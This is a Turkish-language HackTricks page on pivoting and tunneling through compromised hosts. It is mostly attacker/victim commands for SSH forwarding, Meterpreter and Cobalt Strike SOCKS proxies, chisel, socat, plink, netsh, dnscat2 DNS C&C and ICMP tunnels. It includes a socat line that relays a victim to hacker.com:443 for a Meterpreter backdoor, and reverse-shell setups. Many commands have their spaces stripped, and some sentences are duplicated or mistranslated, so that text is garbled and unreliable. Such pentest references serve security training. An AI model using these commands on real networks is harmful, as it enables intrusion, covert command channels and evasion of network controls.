Bir siber güvenlik şirketinde mi çalışıyorsunuz?Şirketinizi HackTricks'te reklamını görmek ister misiniz? veya PEASS'ın en son sürümüne erişmek veya HackTricks'i PDF olarak indirmek ister misiniz?ABONELİK PLANLARI'na göz atın!
ICMP ve SYN taramaları çorap proxy'ler aracılığıyla tünellenemez, bu nedenle bu işlem için ping keşfini devre dışı bırakmalıyız (-Pn) ve TCP taramalarını belirtmeliyiz (-sT).
Bash
Ana Bilgisayar -> Atlama -> DahiliA -> DahiliB
# On the jump server connect the port 3333 to the 5985mknodbackpipep;nc-lvnp59850<backpipe|nc-lvnp33331>backpipe# On InternalA accessible from Jump and can access InternalB## Expose port 3333 and connect it to the winrm port of InternalBexec3<>/dev/tcp/internalB/5985exec4<>/dev/tcp/Jump/3333cat<&3>&4&cat<&4>&3&# From the host, you can now access InternalB from the Jump serverevil-winrm-uusername-iJump
SSH
SSH grafik bağlantısı (X)
ssh-Y-C<user>@<ip>#-Y is less secure but faster than -X
Yerel Port2Port
Yeni bir Port açın SSH Sunucusu --> Diğer port
ssh-R0.0.0.0:10521:127.0.0.1:1521user@10.0.0.1#Local port 1521 accessible in port 10521 from everywhere
ssh-R0.0.0.0:10521:10.0.0.1:1521user@10.0.0.1#Remote port 1521 accessible in port 10521 from everywhere
Port2Port
Yerel port --> Kompromize edilmiş ana bilgisayar (SSH) --> Üçüncü_kutu:Port
ssh -i ssh_key <user>@<ip_compromised> -L <attacker_port>:<ip_victim>:<remote_port> [-p <ssh_port>] [-N -f] #This way the terminal is still in your host
#Examplesudossh-L631:<ip_victim>:631-N-f-l<username><ip_compromised>
Port2hostnet (proxychains)
Yerel Port --> Kompromize edilmiş ana makine (SSH) --> Herhangi bir yer
ssh -f -N -D <attacker_port> <username>@<ip_compromised> #All sent to local port will exit through the compromised server (use as proxy)
Ters Port Yönlendirme
Bu, iç ağdaki ana bilgisayarlar üzerinden bir DMZ aracılığıyla ters kabuk almak için kullanışlıdır:
ssh-idmz_key-R<dmz_internal_ip>:443:0.0.0.0:7000root@10.129.203.111-vN# Now you can send a rev to dmz_internal_ip:443 and caputure it in localhost:7000# Note that port 443 must be open# Also, remmeber to edit the /etc/ssh/sshd_config file on Ubuntu systems# and change the line "GatewayPorts no" to "GatewayPorts yes"# to be able to make ssh listen in non internal interfaces in the victim (443 in this case)
VPN-Tünel
Her iki cihazda da root yetkisine ihtiyacınız var (yeni arayüzler oluşturacağınız için) ve sshd yapılandırması root girişine izin vermelidir:
PermitRootLogin yesPermitTunnel yes
sshroot@server-wany:any#This will create Tun interfaces in both devicesipaddradd1.1.1.2/32peer1.1.1.1devtun0#Client side VPN IPifconfigtun0up#Activate the client side network interfaceipaddradd1.1.1.1/32peer1.1.1.2devtun0#Server side VPN IPifconfigtun0up#Activate the server side network interface
Yerel port --> Kompromize edilmiş ana makine (aktif oturum) --> Üçüncü_kutu:Port
# Inside a meterpreter sessionportfwdadd-l<attacker_port>-p<Remote_port>-r<Remote_host>
SOCKS
SOCKS (Socket Secure) protokolü, ağ trafiğini bir ağ üzerinden yönlendirmek için kullanılan bir protokoldür. SOCKS sunucuları, istemci isteklerini alır ve hedef sunuculara iletmek için bağlantıları yönlendirir. Bu, ağ trafiğini gizlemek ve coğrafi kısıtlamaları aşmak için kullanılabilir.
background#meterpretersessionrouteadd<IP_victim><Netmask><Session># (ex: route add 10.10.10.14 255.255.255.0 8)useauxiliary/server/socks_proxyrun#Proxy port 1080 by defaultecho"socks4 127.0.0.1 1080">/etc/proxychains.conf#Proxychains
Başka bir yöntem:
background#meterpreter sessionusepost/multi/manage/autoroutesetSESSION<session_n>setSUBNET<New_net_ip>#Ex: set SUBNET 10.1.13.0setNETMASK<Netmask>runuseauxiliary/server/socks_proxysetVERSION4arun#Proxy port 1080 by defaultecho"socks4 127.0.0.1 1080">/etc/proxychains.conf#Proxychains
Cobalt Strike
SOCKS proxy
Takım sunucusunda dinleyen bir port açın ve trafiği beacon üzerinden yönlendirmek için kullanılabilen tüm arayüzlerde dinlemeye başlayın.
beacon>socks1080[+] started SOCKS4a server on: 1080# Set port 1080 as proxy server in proxychains.confproxychainsnmap-n-Pn-sT-p445,3389,598510.10.17.25
rPort2Port
Bu durumda, liman, işaretçi ana bilgisayarında açılır, Takım Sunucusunda değil ve trafik Takım Sunucusuna ve oradan belirtilen ana bilgisayara:limana gönderilir.
Bu durumda, liman Beacon ana bilgisayarında açılır, Team Sunucusunda değil ve trafik Cobalt Strike istemcisine gönderilir (Team Sunucusuna değil) ve oradan belirtilen ana bilgisayara:limana yönlendirilir.
https://github.com/jpillora/chiselın yayınlar sayfasından indirebilirsiniz.
İstemci ve sunucu için aynı sürümü kullanmanız gerekmektedir
socks
./chiselserver-p8080--reverse#Server -- Attacker./chisel-x64.execlient10.10.14.3:8080R:socks#Client -- Victim#And now you can use proxychains with port 1080 (default)./chiselserver-v-p8080--socks5#Server -- Victim (needs to have port 8080 exposed)./chiselclient-v10.10.10.10:8080socks#Attacker
#Create meterpreter backdoor to port 3333 and start msfconsole listener in that portattacker>socatOPENSSL-LISTEN:443,cert=server.pem,cafile=client.crt,reuseaddr,fork,verify=1TCP:127.0.0.1:3333
victim> socat.exe TCP-LISTEN:2222 OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|TCP:hacker.com:443,connect-timeout=5
#Execute the meterpreter
Kurbanın konsolunda son yerine bu satırı çalıştırarak kimlik doğrulaması yapılmamış bir proxy'yi atlayabilirsiniz:
Her iki tarafta da sertifikalar oluşturun: İstemci ve Sunucu
# Execute these commands on both sidesFILENAME=socatsslopensslgenrsa-out $FILENAME.key1024opensslreq-new-key $FILENAME.key-x509-days3653-out $FILENAME.crtcat $FILENAME.key $FILENAME.crt>$FILENAME.pemchmod600 $FILENAME.key $FILENAME.pem
Yerel SSH portunu (22) saldırganın ana bilgisayarının 443 portuna bağlayın
attacker> sudo socat TCP4-LISTEN:443,reuseaddr,fork TCP4-LISTEN:2222,reuseaddr #Redirect port 2222 to port 443 in localhost
victim> while true; do socat TCP4:<attacker>:443 TCP4:127.0.0.1:22 ; done # Establish connection with the port 443 of the attacker and everything that comes from here is redirected to port 22
attacker>sshlocalhost-p2222-lwww-data-ivulnerable#Connects to the ssh of the victim
Plink.exe
Bu, konsol PuTTY sürümü gibidir (seçenekler bir ssh istemcisine çok benzer).
Bu ikili, kurban üzerinde yürütüleceği için ve bir ssh istemcisi olduğu için, ters bağlantıya sahip olabilmek için ssh hizmetimizi ve bağlantı noktamızı açmamız gerekmektedir. Ardından, yalnızca yerel olarak erişilebilir bağlantı noktasını makinedeki bir bağlantı noktasına yönlendirmek için:
echo y | plink.exe -l <Our_valid_username> -pw <valid_password> [-p <port>] -R <port_ in_our_host>:<next_ip>:<final_port> <your_ip>
echoy|plink.exe-lroot-pwpassword [-p 2222]-R9090:127.0.0.1:909010.11.0.41#Local port 9090 to out port 9090
Windows netsh
Port2Port
Herhangi bir bağlantı noktası için yerel yönetici olmanız gerekmektedir.
netshinterfaceportproxyaddv4tov4listenaddress=listenport=connectaddress=connectport=protocol=tcp# Example:netshinterfaceportproxyaddv4tov4listenaddress=0.0.0.0listenport=4444connectaddress=10.10.10.10connectport=4444# Check the port forward was created:netshinterfaceportproxyshowv4tov4# Delete port forwardnetshinterfaceportproxydeletev4tov4listenaddress=0.0.0.0listenport=4444
SocksOverRDP & Proxifier
Sisteme RDP erişimine sahip olmanız gerekmektedir.
İndirme:
SocksOverRDP x64 İkili Dosyaları - Bu araç, Windows'un Uzak Masaüstü Hizmeti özelliğinden Dynamic Virtual Channels (DVC) kullanır. DVC, paketleri RDP bağlantısı üzerinden tünellemeden sorumludur.
İstemci bilgisayarınıza şu şekilde SocksOverRDP-Plugin.dll yükleyin:
# Load SocksOverRDP.dll using regsvr32.exeC:\SocksOverRDP-x64>regsvr32.exeSocksOverRDP-Plugin.dll
Şimdi mstsc.exe kullanarak RDP üzerinden hedefe bağlanabiliriz ve SocksOverRDP eklentisinin etkinleştirildiğine dair bir uyarı almalıyız ve 127.0.0.1:1080 üzerinde dinleyecektir.
RDP üzerinden bağlanın ve hedef makinedeSocksOverRDP-Server.exe ikili dosyasını yükleyip çalıştırın:
C:\SocksOverRDP-x64> SocksOverRDP-Server.exe
Şimdi, makinenizde (saldırgan) 1080 numaralı portun dinlemede olduğunu doğrulayın:
netstat -antb | findstr 1080
Şimdi o trafiği o bağlantı noktası üzerinden vekillemek için Proxifierkullanabilirsiniz.
Windows GUI Uygulamalarını Vekil Yapma
Windows GUI uygulamalarını bir proxy üzerinden gezinmek için Proxifier kullanabilirsiniz.
Profil -> Vekil Sunucular bölümüne SOCKS sunucusunun IP'sini ve bağlantı noktasını ekleyin.
Profil -> Vekillendirme Kuralları bölümüne vekilleştirmek istediğiniz programın adını ve vekilleştirmek istediğiniz IP'lerin bağlantılarını ekleyin.
NTLM vekil atlatma
Önceden bahsedilen araç: RpivotOpenVPN ayrıca bunu atlayabilir, yapılandırma dosyasında şu seçenekleri ayarlayarak:
Bu, bir proxy'e kimlik doğrulaması yapar ve belirttiğiniz harici hizmete yönlendirilen yerel bir bağlantı noktası bağlar. Daha sonra, bu bağlantı noktası aracılığıyla istediğiniz aracı kullanabilirsiniz.
Örneğin, 443 numaralı bağlantı noktasını yönlendirir.
Username Alice
Password P@ssw0rd
Domain CONTOSO.COM
Proxy 10.0.0.10:8080
Tunnel 2222:<attackers_machine>:443
Şimdi, örneğin kurbanın SSH servisini 443 numaralı porta dinlemesi için ayarlarsanız. Saldırgan port 2222 üzerinden buna bağlanabilirsiniz.
Ayrıca localhost:443'e bağlanan bir meterpreter kullanabilir ve saldırgan 2222 numaralı porta dinleyebilir.
DNS üzerinden bir C&C kanalı oluşturur. Kök izinlerine ihtiyaç duymaz.
attacker>ruby./dnscat2.rbtunneldomain.comvictim>./dnscat2tunneldomain.com# If using it in an internal network for a CTF:attacker>rubydnscat2.rb--dnshost=10.10.10.10,port=53,domain=mydomain.local--no-cachevictim>./dnscat2--dnshost=10.10.10.10,port=5353
PowerShell'de
PowerShell'de bir dnscat2 istemcisini çalıştırmak için dnscat2-powershell kullanabilirsiniz:
session-i<sessions_id>listen [lhost:]lport rhost:rport #Ex: listen 127.0.0.1:8080 10.0.0.20:80, this bind 8080port in attacker host
Proxychains DNS'ini Değiştirme
Proxychains, gethostbyname libc çağrısını engeller ve tcp DNS isteğini socks proxy üzerinden tüneller. Varsayılan olarak, proxychains'in kullandığı DNS sunucusu 4.2.2.2'dir (sabitlenmiş). Değiştirmek için, dosyayı düzenleyin: /usr/lib/proxychains3/proxyresolv ve IP'yi değiştirin. Eğer Windows ortamında iseniz, alan denetleyicisinin IP'sini ayarlayabilirsiniz.
Her iki sistemde de kök erişimi gereklidir, tün adaptörleri oluşturmak ve ICMP echo isteklerini kullanarak aralarında veri tünelleme yapmak için.
./hans-v-f-s1.1.1.1-pP@ssw0rd#Start listening (1.1.1.1 is IP of the new vpn connection)./hans-f-c<server_ip>-pP@ssw0rd-vping1.1.1.100#After a successful connection, the victim will be in the 1.1.1.100
# Generate itsudo./autogen.sh# Server -- victim (needs to be able to receive ICMP)sudoptunnel-ng# Client - Attackersudoptunnel-ng-p<server_ip>-l<listen_port>-r<dest_ip>-R<dest_port># Try to connect with SSH through ICMP tunnelssh-p2222-luser127.0.0.1# Create a socks proxy through the SSH connection through the ICMP tunnelssh-D9050-p2222-luser127.0.0.1
ngrok
ngrok bir komut satırında internete çözümleri açığa çıkarmak için bir araçtır.Açığa çıkarma URI'leri şuna benzer:UID.ngrok.io
Kurulum
Bir hesap oluşturun: https://ngrok.com/signup
İstemci indirme:
tar xvzf ~/Downloads/ngrok-v3-stable-linux-amd64.tgz -C /usr/local/bin
chmod a+x ./ngrok
# Init configuration, with your token
./ngrok config edit
**Bir **cybersecurity şirketinde mi çalışıyorsunuz? Şirketinizin HackTricks'te reklamını görmek ister misiniz? ya da PEASS'ın en son sürümüne erişmek veya HackTricks'i PDF olarak indirmek ister misiniz? ABONELİK PLANLARINI kontrol edin!